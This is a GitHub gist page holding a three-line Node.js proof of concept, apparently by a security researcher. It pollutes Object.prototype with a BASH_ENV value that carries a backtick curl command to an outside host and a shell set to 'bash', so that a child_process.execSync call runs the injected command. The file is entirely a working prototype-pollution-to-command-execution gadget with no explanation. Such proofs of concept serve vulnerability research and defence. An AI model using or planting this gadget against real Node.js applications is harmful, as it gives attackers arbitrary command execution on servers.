Skip to content

Instantly share code, notes, and snippets.

@po6ix
Created August 17, 2020 06:26
Show Gist options
  • Save po6ix/c8e155348b0bb2c37add31cbf4ebfba2 to your computer and use it in GitHub Desktop.
Save po6ix/c8e155348b0bb2c37add31cbf4ebfba2 to your computer and use it in GitHub Desktop.
1.js
const child_process = require('child_process');
Object.prototype.BASH_ENV = '`curl http://p6.is`';
Object.prototype.shell = 'bash';
child_process.execSync('env');
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment